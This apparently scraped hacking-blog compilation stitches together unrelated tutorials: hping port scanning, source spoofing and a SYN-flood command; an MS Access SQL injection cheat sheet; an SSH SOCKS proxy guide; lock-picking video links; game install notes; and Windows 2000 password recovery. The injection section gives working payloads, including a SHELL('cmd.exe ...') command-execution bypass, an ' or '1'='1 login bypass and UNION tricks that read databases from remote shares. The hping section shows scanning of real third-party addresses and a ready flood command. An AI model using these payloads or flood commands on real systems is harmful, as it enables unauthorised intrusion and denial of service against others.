https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGKl8pYq3yDkyuHe4K8KOG8Cdbd1uXUxibDnd-E9hWDJ_AXEaE1ENJ4xH5SIL31baspeGm_kd1zL7CG_YRbSGTSbeX_FnrjVAuSWDYVd6gAJg4Z29_F-nIt0YZApvA05Uv65ZXkDdmXq4/s1600-h/3.jpg

6.) Thats it!!! At this point you should see it go through the installation process. Click Finish
when it is complete.

Now that python is installed lets go download a python script and run it.

1.) First we find a python script and save it with the extension .py
In the picture you can see we found a joomla scanner and saved it as joomlascan.py in our
Python directory C:\Python25

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8oelF4iX-YW-jmh67DQwpjclLzRcPMj4OfaKsNwJA2PdLcXm1HsiRraO9-bmhrrjJgN-kXvUsD8dKCJ3_yLWY-R6Ovru7AiJsgLLfPkq6h3T0SHjB-apt1Sfi-R8S3XMlo1o6AO-54Gg/s1600-h/4.jpg

2.) Now lets run the command prompt by going to Start >> Run and typing cmd.exe and hitting Enter
Your command prompt (cmd.exe) should load and be ready for commands.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYLH4UbOIDTJrSygt6-F2cA0zcYkUBeXYwH5elYnTsnVt-AxIxLt9TFyplH9SsDlwuYHbTE84YXWAGRtnpf1qNu4S6Go5XAUVmTs0ZuxIBOk8BjT2u2Cx3VxIuJ4t4JIOZZ3t5sjx37l4/s1600-h/5.jpg

3.) Now we need to move to where we installed python (C:\Python25) with the cd command.
After typing cd C:\Python25 and hitting Enter you should see.

C:\Python25>_

4.) At this point you can use the dir command to view the files but we already know joomlascan.py is
in this directory.

5.) To run the script all you have to type is: python joomlascan.py
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgF_Zb-Eulp6pX9OG1uVRblohwkyTjKuFeGq2HBWThcl3f7nhyPmPG4f1-isGUcmCnGH_qe51vE56O9wi3ypUXjVRs9b3NNRP2gnDyk0zYjF4b420jySTgpaVnEKXqF88KzPHw4He9jLw/s1600-h/6.jpg

Ngrep Tutorial

ngrep - network grep tutorial

by d3hydr8 > www.darkc0de.com
date: 12/19/07

Homepage: http://ngrep.sourceforge.net/
Download: http://ngrep.sourceforge.net/download.html

Description:

ngrep strives to provide most of GNU grep's common features, applying them to
the network layer. ngrep is a pcap-aware tool that will allow you to specify
extended regular or hexadecimal expressions to match against data payloads of
packets. It currently recognizes IPv4/6, TCP, UDP, ICMPv4/6, IGMP and Raw across
Ethernet, PPP, SLIP, FDDI, Token Ring and null interfaces, and understands BPF
filter logic in the same fashion as more common packet sniffing tools, such as
tcpdump and snoop.

First, lets look at installing it. I'm not much of a writer so I will just show
the commands used throughout most of this tutorial.


hey guys this tutorial is getting error message when posting it here,so that's why we decided to post the tutorial in our own external link which is :-
http://orkutadminby.freehostia.com/DarkCodeCracker%20Files/Ngreptutorial.txt

Hping Tutorial

Hping - Active Network Security Tool
Hping Tutorial

by d3hydr0 > http://darkcodecracker.blogspot.com/
date: 12/24/07
Homepage: http://www.hping.org/
Download: http://www.hping.org/download.php
Description:
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface
is inspired to the ping(8) unix command, but hping isn't only able to send ICMP
echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute
mode, the ability to send files between a covered channel, and many other
features.
First, lets look at installing it. I'm not much of a writer so I will just show
the commands used throughout most of this tutorial.
---------------------------------------------------------------------
d3hydr8@linuxbox:~> ls grep hping
hping3-20051105.tar.gz
d3hydr8@linuxbox:~> tar xvf hping3-20051105.tar.gz
hping3-20051105/
hping3-20051105/CVS/
hping3-20051105/CVS/Root
hping3-20051105/CVS/Repository
hping3-20051105/CVS/Entries
[...]
d3hydr8@linuxbox:~> ls
hping3-20051105 hping3-20051105.tar.gz
d3hydr8@linuxbox:~> cd hping3-20051105
linuxbox:/home/d3hydr8/hping3-20051105 # ./configure
build byteorder.c...
create byteorder.h...
[...]
linuxbox:/home/d3hydr8/hping3-20051105 # make
gcc -c -O2 -Wall -DUSE_TCL -g libpcap_stuff.c
gcc -c -O2 -Wall -DUSE_TCL -g memlockall.c
[...]
linuxbox:/home/d3hydr8/hping3-20051105 # make install
cp -f hping3 /usr/sbin/
chmod 755 /usr/sbin/hping3
ln -s /usr/sbin/hping3 /usr/sbin/hping
ln -s /usr/sbin/hping3 /usr/sbin/hping2
linuxbox:/home/d3hydr8/hping3-20051105 # ./hping3 -v
hping version 3.0.0-alpha-1 ($Id: release.h,v 1.4 2004/04/09 23:38:56 antirez
Exp $)
This binary is TCL scripting capable
---------------------------------------------------------------------
Now that we have hping installed lets enter the hping3 interactive shell and
use the resolve command.
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # hping3
hping3> hping resolve www.darkc0de.com
97.82.189.122
---------------------------------------------------------------------
You can find a complete list of commands in the hping3 API page.
http://wiki.hping.org/34
Hping2 is the old version of the tool supporting the command line interface,
while the new hping3 is the evolution that adds a Tcl scripting engine.
Since we will be working mainly with the command line, you will see me
using hping2 from here on. By using the --help command you will see a list
of commands supported by hping or scroll to the bottom of this tutorial.
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # hping2 --help
usage: hping host [options]
---------------------------------------------------------------------
Lets start with some port scanning...
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # host yahoo.com
yahoo.com has address 66.94.234.13
[...]
linuxbox:/home/d3hydr8 # hping -I wlan0 -S 66.94.234.13 -p 80 -c 3
HPING 66.94.234.13 (wlan0 66.94.234.13): S set, 40 headers + 0 data bytes
len=40 ip=66.94.234.13 ttl=110 id=18735 sport=80 flags=SA seq=0 win=8192 rtt=95.7 ms
len=40 ip=66.94.234.13 ttl=112 id=18931 sport=80 flags=SA seq=1 win=8192 rtt=97.9 ms
len=40 ip=66.94.234.13 ttl=110 id=19104 sport=80 flags=SA seq=2 win=8192 rtt=94.4 ms
--- 66.94.234.13 hping statistic ---
3 packets tramitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 94.4/96.0/97.9 ms
---------------------------------------------------------------------
In this output you can see that we used the -I option to choose our interface
name (wlan0). You can get your interface name by using the ifconfig command.
We used the -S option for our scan type SYN aka Stealth scan. We
also chose to scan port 80 and only capture 3 packets using the -c option.
flags=SA >> open
flags=RA >> closed
As you can see by that little table port 80 was open. Lets try another
example with a few more flags.
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # hping2 -I wlan0 -S 66.94.234.13 -M 3000 -p ++21 --fast
HPING 66.94.234.13 (wlan0 66.94.234.13): S set, 40 headers + 0 data bytes
len=40 ip=66.94.234.13 ttl=110 id=17176 sport=80 flags=SA seq=59 win=8192 rtt=100.5 ms
len=40 ip=66.94.234.13 ttl=112 id=22501 sport=443 flags=SA seq=422 win=8192 rtt=101.9 ms
---------------------------------------------------------------------
As you can see from this example we are doing another port scan but this time
incrementing the ports from 21 with the -p ++21 option (21,22,23,etc). We also
use the --fast option which is self-explanatory. The other option is the
-M 3000 which will set the TCP sequence number to 3000.
Port scans are noisy, so let's look at an option that hides where they come from — with
the caveat, visible in the statistics below, that it also hides the answers from us.
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # hping2 -I wlan0 -SA -a 192.168.1.100 66.94.234.13 -p ++21 --faster
HPING 66.94.234.13 (wlan0 66.94.234.13): SA set, 40 headers + 0 data bytes
len=40 ip=66.94.234.13 ttl=255 id=6899 sport=80 flags=R seq=0 win=0 rtt=0.0 ms
--- 66.94.234.13 hping statistic ---
161083 packets tramitted, 1 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
---------------------------------------------------------------------
Here we used the -a option to spoof the source address, and -SA to set both SYN and ACK.
Two caveats before relying on this: because the replies go to the spoofed address
(192.168.1.100) rather than to us, hping reports 100% packet loss and the scan tells us
nothing about the ports — spoofing is useful for decoys and flooding, not for getting
results back; and a SYN/ACK probe draws a RST from open and closed ports alike, so it can
only show whether a stateless filter lets the packet through. Note also that many
networks drop packets whose source address is not their own (BCP 38 egress filtering),
so spoofed packets may never leave your ISP. To confirm the source address was really
being rewritten I ran a session of tcpdump.
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # tcpdump -i wlan0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wlan0, link-type EN10MB (Ethernet), capture size 96 bytes
00:14:03.969419 IP 192.168.1.100.29664 > w2.rc.vip.scd.yahoo.com.27299: S 247614302:247614302(0) ack 1324676282 win 512
00:14:03.971087 IP 192.168.1.100.29665 > w2.rc.vip.scd.yahoo.com.27300: S 1843027743:1843027743(0) ack 503065324 win 512
---------------------------------------------------------------------
Just as I expected my ip is being spoofed "IP 192.168.1.100.29664".
Lets try some firewall, traceroute action. First lets use nmap to scan a port.
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # nmap -sS 69.147.122.169 -p 25
Starting Nmap 4.50 ( http://insecure.org ) at 2007-12-24 00:52 EST
Interesting ports on srp42r2.flickr.re2.yahoo.com (69.147.122.169):
PORT STATE SERVICE
25/tcp filtered smtp
Nmap done: 1 IP address (1 host up) scanned in 1.489 seconds
---------------------------------------------------------------------
It seems this port is filtered by a firewall (neither a SYN/ACK nor a RST came back). Lets test it with hping and
a couple of new options:
-t sets initial ttl in the IP header
-z binds the “ctrl+z” key combination to the ttl, meaning every time
you press “crtl+z” the TTL field is increased.
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # hping -I wlan0 -z -t 6 -S 69.147.122.169 -p 25
HPING 69.147.122.169 (wlan0 69.147.122.169): S set, 40 headers + 0 data bytes
TTL 0 during transit from ip=172.22.32.217 name=UNKNOWN
7: TTL 0 during transit from ip=216.206.221.149 name=atl-edge-18.inet.qwest.net
8: TTL 0 during transit from ip=205.171.21.161 name=atl-core-01.inet.qwest.net
9: TTL 0 during transit from ip=67.14.8.206 name=cer-core-02.inet.qwest.net
10: TTL 0 during transit from ip=205.171.139.118 name=chp-brdr-02.inet.qwest.net
12: TTL 0 during transit from ip=66.110.27.90 name=if-5-0-0-720.core2.DTX-Dallas.teleglobe.net
13: TTL 0 during transit from ip=66.198.2.10 name=ix-4-1.core2.DTX-Dallas.teleglobe.net
14: TTL 0 during transit from ip=216.115.101.144 name=so-4-1-0.pat1.dce.yahoo.com
15: TTL 0 during transit from ip=216.115.108.61 name=ge-3-1-0-p150.msr2.re1.yahoo.com
16: TTL 0 during transit from ip=206.190.41.73 name=te4-1.bas-b2.re2.yahoo.com
17: len=40 ip=69.147.122.169 ttl=255 id=31610 sport=25 flags=SA seq=0 win=0 rtt=0.0 ms
len=40 ip=69.147.122.169 ttl=255 id=21098 sport=25 flags=SA seq=0 win=0 rtt=0.0 ms
len=40 ip=69.147.122.169 ttl=255 id=2613 sport=25 flags=SA seq=0 win=0 rtt=0.0 ms
---------------------------------------------------------------------
As you can see above, the probe reached the server after 11 more hops (TTL 6 → 17). Be careful with the result, though: nmap reported 25/tcp as filtered while hping got SYN/ACK back, and those replies carry ttl=255, win=0 and rtt=0.0 ms, which is not what a genuine reply from a host 17 hops away would look like — re-run with -V and a packet capture before concluding the port is open.
hping will also generate a SYN flood with just two extra options. Only ever do this against a host you own or are explicitly authorized to test — it affects the target and every network in between, and a spoofed source (-a) means the backscatter lands on someone else.
-a option to spoof your source address
-i sets the inter-packet interval; u1000 means 1000 microseconds, i.e. roughly 1000 packets per second (hping's own help text below understates this as "100 packets for second"); --flood sends as fast as possible
hping2 -I wlan0 -a 192.168.1.100 -S 192.168.1.104 -p 6667 -i u1000
I hope you learned something about the basic workings of hping from this
tutorial. I encourage you to check out all the options and techniques
hping has to offer.
visit darkc0de.com, thanks d3hydr8[at]darkc0de[dot]com
Hping Options:
usage: hping host [options]
-h --help show this help
-v --version show version
-c --count packet count
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets for second)
--faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don't show replies.
-n --numeric numeric output
-q --quiet quiet
-I --interface interface name (otherwise default routing interface)
-V --verbose verbose mode
-D --debug debugging info
-z --bind bind ctrl+z to ttl (default to dst port)
-Z --unbind unbind ctrl+z
--beep beep for every matching packet received
Mode
default mode TCP
-0 --rawip RAW IP mode
-1 --icmp ICMP mode
-2 --udp UDP mode
-8 --scan SCAN mode.
Example: hping --scan 1-30,70-90 -S www.target.host
-9 --listen listen mode
IP
-a --spoof spoof source address
--rand-dest random destionation address mode. see the man.
--rand-source random source address mode. see the man.
-t --ttl ttl (default 64)
-N --id id (default random)
-W --winid use win* id byte ordering
-r --rel relativize id field (to estimate host traffic)
-f --frag split packets in more frag. (may pass weak acl)
-x --morefrag set more fragments flag
-y --dontfrag set dont fragment flag
-g --fragoff set the fragment offset
-m --mtu set virtual mtu, implies --frag if packet size > mtu
-o --tos type of service (default 0x00), try --tos help
-G --rroute includes RECORD_ROUTE option and display the route buffer
--lsrr loose source routing and record route
--ssrr strict source routing and record route
-H --ipproto set the IP protocol field, only in RAW IP mode
ICMP
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
--force-icmp send all icmp types (default send only supported types)
--icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
--icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
--icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
--icmp-help display help for others icmp options
UDP/TCP
-s --baseport base source port (default random)
-p --destport [+][+] destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum
many systems will fix the IP checksum sending the packet
so you'll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
--tcpexitcode use last tcp->th_flags as exit code
--tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
Common
-d --data data size (default is 0)
-E --file data from file
-e --sign add 'signature'
-j --dump dump packets in hex
-J --print dump printable characters
-B --safe enable 'safe' protocol
-u --end tell you when --file reached EOF and prevent rewind
-T --traceroute traceroute mode (implies --bind and --ttl 1)
--tr-stop Exit when receive the first not ICMP in traceroute mode
--tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
--tr-no-rtt Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
--apd-send Send the packet described with APD (see docs/APD.txt)

bT3 Installed and with warcraft 3

4 hours TT me noob
STEP 1:

#Download and install backtrack 3 burn it to a disk
#Launch backtrack 3 live:
mount
umount /dev/hda1 # or sda1
#umount /anyother/partions#
fdisk /dev/hda # or /dev/sda — the keystrokes below are fdisk's interactive prompts
n
p #just put in a partition somewhere if you know what to do
1 # or first available
w
reboot
STEP 2:

mount
umount /dev/hda1
mke2fs /dev/hda1
mkdir /mnt/backtrack
mount /dev/hda1 /mnt/backtrack
# Launch GUI
#Field 1: already set
#Field 2: /mnt/backtrack
#Field 3: /dev/hda # or /dev/sda whichever applies
#Uncheck the restore checkbox ASSUMING YOU HAVE NO PREVIOUS OS
#INSTALLED
#CLICK INSTALL
reboot
STEP 3 IS ONLY NECESSARY IF YOUR HARDWARE DOESN'T NATIVELY SUPPORT DIRECT 3D MOST DON'T!
STEP 3:

#GO HERE AND FOLLOW THE INSTRUCTIONS
#MAKE SURE TO SET A VIRTUAL DESKTOP PReferably 640x480
http://wine-review.blogspot.com/2007/11/directx-90c-on-linux-with-wine.html
AND/OR
STEP 3:

#Get a 1/2gig usb drive plug it into a windows installation with direct X
#Copy everything in system32 or just the files
#go back to backtrack3
#copy all the files in system 32 into
#/root/.wine/c_drive/windows/system32
STEP 4: OR IGNORE AND DO SIX AND THEN FIVE

#Install war3
cd /path/tocd/
wine install.exe
#... this is pretty straight forward
STEP 5:

#GET AWC
http://www.freewebs.com/superbug77/AWC.rar
#GET FREEBSD RAR COMMANDLINE
http://www.win-rar.com/index.php?id=160&dl=rarbsd-3.7.1.tar.gz
#DO STUFF
tar -xvf rarbsd-3.7.1.tar.gz
unrar e AWC.rar /root/AWC
cd AWC
wine AWC.exe
#Configure LOWEST GRAPHICAL SETTINGS AND
#Unset the option in graphics specifically mentioned for opengl
STEP 6:

#Update warcraft due to the fact that warcraft tries to restart wc3 which just
#massively fucks shit up
#Trying to update it is a lost cause BUT WASTE YOUR TIME IF YOU WANT!
#You might have luck with making xwindows control it....probably not

# I advise you to transfer the files from and updated war3 install that are #patched
and copy
#IF you skipped 4 just copy everything and you are set
#IF you did 4 then well great
STEP 7:

cd "/root/.wine/drive_c/Program Files/Warcraft III"
wine "Frozen Throne.exe" -opengl
And get ready for the lag

28 lock picking video tutorials

Club combo lock
http://youtube.com/watch?v=bwVOCTSY_7g
Tubular lock picking
http://www.youtube.com/watch?v=f0ULLsSABXM&NR=1
Pick lock of Abloy 900
http://www.youtube.com/watch?v=9wZCO1bPOis&NR=1
Lock pick of Abloy SL 900 and SL 901
http://www.youtube.com/watch?v=spIoXNdW240
Lock pick of CISA
http://www.youtube.com/watch?v=ZIbE646cdlg
Lockpicking an AZBE lock (ASSA ABLOY GROUP)
http://www.youtube.com/watch?v=EPRa-gMpuLY
Pick lock of Yale ML 04
http://www.youtube.com/watch?v=SLL0AKwCzA0
Picking an old Assa industrial
http://www.youtube.com/watch?v=q1Ojswx6_t8
Lockpicking a TESA TE5 Security lock
http://www.youtube.com/watch?v=dUbNhbjT8gU
Kwikset Lockpick
http://www.youtube.com/watch?v=Elsk5QVulYQ
Lockpicking a 6 pin MCM Dimple Security lock
http://www.youtube.com/watch?v=7n8BhqLJl2c
Lockpicking a Dimple Lock
http://www.youtube.com/watch?v=8qOp4Xn7JVE
Lockpicking a ABUS C83 Lock and ABUS 85/40 Padlock
http://www.youtube.com/watch?v=c2MRi0Lk1aM
Lockpicking a ABUS Bond Lock
http://www.youtube.com/watch?v=btxcqGxEV0w
Abus 65/50 padlock
http://www.youtube.com/watch?v=5wd8lnA8PE0
lockpicking a Abus 65/40 brass padlock
http://www.youtube.com/watch?v=nrosMmzyz3g
Lockpicking a ABUS 65/30 Lock
http://www.youtube.com/watch?v=1cOqmrfTSyQ
How to pick a Master Lock #175
http://www.youtube.com/watch?v=jCz3_ladHNM
Lock Pick Master lock #3
http://www.youtube.com/watch?v=OADFuzQ6CAI
Master Lock no. 1
http://www.youtube.com/watch?v=YJoBn90mGHU
Lock Picking : Brinks High Security Padlock
http://www.youtube.com/watch?v=uNVGuR-szi4
Lockpicking : No 140 Masterlock
http://www.youtube.com/watch?v=wWjjeacyboM
Unlocking the Master 47
http://www.youtube.com/watch?v=VnhyFpvSbs4
Dudley Padlock Picked
http://www.youtube.com/watch?v=3Ghf5PR2lBU
"How-to": Crack a combination lock
http://www.youtube.com/watch?v=BA6zN7GZlCQ
How Safe Dialing Works
http://www.youtube.com/watch?v=VdCADFapBuI
Open an AXA bike lock with a blank key (Doh)
http://www.youtube.com/watch?v=K4SUSt2cwEk
Masterlock #17
http://www.youtube.com/v/FfzqV3mFxk8

SSH Tunneling - Socks4

[Written by D3hydro]
SSH Tunneling - Setting up a SOCKS proxy.
This tutorial is aimed at people with secure shell access who want to use that SSH connection to set up a reliable SOCKS proxy (PuTTY's dynamic forward speaks SOCKS4, SOCKS4A and SOCKS5).
It does not matter which account you log in as — an unprivileged user is fine — as long as the server's sshd permits TCP forwarding (AllowTcpForwarding, which is on by default in OpenSSH).
WHAT YOU WILL NEED
SSH access on a server.
PuTTy
Start up PuTTy and type in the connection info. Hostname and port as usual.
Once that is done, don't start the connection. Look down the menu on the left hand side, and click on SSH then inside: Tunnels
Now underneath the box destination, tick the checkbox 'Dynamic' and leave the check box below set as Auto
Now look above and in the box called source port, type 1080. Once this is done press add.
Now connect as you would usually to this SSH server and LOGIN as normal.
Once you've logged in the socks proxy is up! the socks4 stays up as long as the ssh connection is active.
Now in the application of your choice (e.g. Firefox) configure a SOCKS proxy with host localhost and port 1080. Prefer SOCKS v5 and enable remote DNS resolution ("Proxy DNS when using SOCKS v5" / network.proxy.socks_remote_dns): with plain SOCKS4 the browser resolves hostnames locally, so every site you visit leaks to your local resolver even though the traffic itself goes through the tunnel.
Your browser traffic is now encrypted between you and the SSH server and leaves the Internet from the server's address rather than your own. Know the limits: the tunnel protects only the hop to the SSH server — from there onward the traffic is in the clear unless the site itself uses TLS, and the server's administrator can see it. PuTTY binds the listener on port 1080 to localhost by default; leave it that way, since anyone who can reach that port can use your tunnel.
Enjoy.
D3hydro

Access SQL injection

================================================== ==========================
% Access SQL Injection
% brett.moore_at_security-assessment.com
================================================== ==========================
Nothing new here, move along..
************************************************** **************************
% MS Access system tables
************************************************** **************************
MSysACEs
MSysObjects
MSysQueries
MSysRelationships
************************************************** **************************
% MS Access command execution, (older versions only)
************************************************** **************************
[Auth Page Script]
' Classic ASP login check. `user` and `pass` are taken straight from the request
' (query string, form or cookie) and are never validated or escaped.
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
' `dsn` is not defined in this snippet; presumably set elsewhere on the page.
Conn.Open dsn
' Vulnerable: the query is built by string concatenation, so a single quote in
' either field breaks out of the literal and rewrites the WHERE clause. The
' Jet/Access engine also exposes SHELL(), which is what the bypass below abuses
' on older versions. Fix: an ADODB.Command with parameters, never concatenation.
SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
rs.open sql,conn
' A non-empty recordset is treated as a successful login -- any row will do.
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
[Auth Page Bypass]
user = SHELL("cmd.exe /c dir > c:\test.txt")
pass = test
************************************************** **************************
% Auth Bypass, Basic
************************************************** **************************
[Auth Page Script]
' Same login check as above: both inputs come unfiltered from the request.
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
' `dsn` is not defined in this snippet; presumably set elsewhere on the page.
Conn.Open dsn
' Vulnerable: with user = ' or '1'='1 the clause becomes
'   ... and user='' or '1'='1'
' which is true for every row, so the recordset is never empty.
' Fix: an ADODB.Command with parameters, never concatenation.
SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
rs.open sql,conn
' Login succeeds whenever at least one row comes back; the password value is
' never compared on the script side.
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
[Auth Page Bypass]
user = ' or '1'='1
pass = test
************************************************** **************************
% Auth Bypass, Simple
************************************************** **************************
[Auth Page Script]
' Variant: only `user` goes into the query; the password is compared in script.
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
' `dsn` is not defined in this snippet; presumably set elsewhere on the page.
Conn.Open dsn
' Still vulnerable: `user` is concatenated, so a UNION can append a row whose
' user/pass columns the attacker controls -- including from a different .mdb via
' Jet's `in '<path>'` clause, as the bypasses below show.
' Fix: an ADODB.Command with parameters, never concatenation.
SQL = "SELECT user,pass FROM users where user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Only the FIRST returned row is checked, so the sort order of the UNION result
' decides which password is compared. The direct string comparison also shows
' passwords are stored in cleartext rather than hashed.
if (rs("pass") = pass) then
' Access Allowed
else
' Access Denied
end if
end if
[Auth Page Bypass Using Shares]
user = ' union select name,password from table1 in '\\share\test\test.mdb
pass = password that is set in \\share\test\test.mdb
[Auth Page Bypass Local mdbs]
user = ' union select '0test','0test' from customers in
'C:\winnt\Help\iisHelp\iis\htm\tutorial\eecustmr.mdb'
pass = 0test
[Union Notes]
Remember that when using unions the sort order can affect which record is
returned first — and in the script above only the first row's password is checked.
************************************************** **************************
% System Path Disclosure
************************************************** **************************
[Sql String]
user = test' union select names from msysobjects in '.
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine
cannot
open the file 'C:\WINNT\system32'. It is already opened exclusively by
another user,
or you need permission to view its data.
************************************************** **************************
% Verify File Exists
************************************************** **************************
[Sql String - non-existant file]
user = test' union select name from msysobjects in '\proof
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\proof'.
[Sql String - existant]
user = test' union select name from msysobjects in '\proof.txt
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format
'C:\proof.txt'.
************************************************** **************************
% Verify Path Exists
************************************************** **************************
[Sql String - non-existant path]
test' union select name from msysobjects in '\nopath\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] 'C:\nopath\sqlerr' is not a valid
path.
Make sure that the path name is spelled correctly and that you are
connected to the
server on which the file resides.
[Sql String - existant path]
user = test' union select name from msysobjects in '\inetpub\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file
'C:\inetpub\sqlerr'.

Bypass password logon in windows 2000

How do I bypass password logon in Windows 2000? The password has been forgotten by both the administrator and the user. QUESTION POSED ON: 26 APR 2001
I'm sorry to say that there is no way to really "bypass" the password login. This is something built-in to Windows 2000 (since the first Windows NT). If you have lost the password and need to gain access to the system, here are a few possible solutions.
You could try to "crack" it or to forcefully reset it to something you know. To crack the password you need a copy of the SAM database — and, because Windows 2000 enables SYSKEY by default, the SYSTEM hive as well (or a hash dump taken from the running system), since the hashes in the SAM are encrypted with a key kept there — then run a tool like L0phtCrack against the hashes. This recovers the password rather than bypassing it, and can take a very long time for a strong one.
You can also use a product called "Locksmith" from Winternals at www.winternals.com. Here is a description of their product from their website:
"Locksmith allows the administrator password to be replaced in cases when it has been lost or forgotten, and works even when the administrative account has been renamed."
The Windows 2000 Autologon feature may also be of interest, but note that it does not solve a forgotten password: you must already know the account's password to configure it. It is also a genuine security risk — DefaultPassword is stored in cleartext in a registry key that ordinary local users can read by default, and anyone who can power on the machine is logged in with that account's rights.
Here are the instructions from TechNet:
WARNING: Using Registry Editor incorrectly can cause serious, system-wide problems that may require you to reinstall Windows NT to correct them. Microsoft cannot guarantee that any problems resulting from the use of Registry Editor can be solved. Use this tool at your own risk.
1. Start REGEDT32.EXE and locate the following Registry subkey:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
2. Using your account name and password, double-click the DefaultUserName entry, type your user name, and then click OK. Double-click the DefaultPassword entry, type your password, and then click OK.
Note: The DefaultPassword value may not exist. If it doesn't, from the Edit menu, choose Add Value. In the Value Name field, type: "DefaultPassword" (without the quotation marks). Select REG_SZ for the Data Type. In the String field, type your password. Save your changes.
Also, if no DefaultPassword string is specified, Windows NT automatically changes the value of the AutoAdminLogon key from 1 (true) to 0 (false), thus disabling the AutoAdminLogon feature.
3. From the Edit menu, choose Add Value. Enter AutoAdminLogon in the Value Name field. Select REG_SZ for the Data Type. Enter 1 in the String field. Save your changes.
4. Exit REGEDT32.
5. Click Start, click Shutdown, and then click OK. Turn off your computer.
6. Restart your computer and Windows NT. You should be able to logon automatically.
Note: To bypass the AutoAdminLogon process and log on as a different user, hold down the SHIFT key after a logoff or after a Windows NT restart.
Note that this only applies to the first logon. To enforce this setting for subsequent logoffs, the administrator needs to set:
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Value: ForceAutoLogon
Type: REG_SZ
Data: 1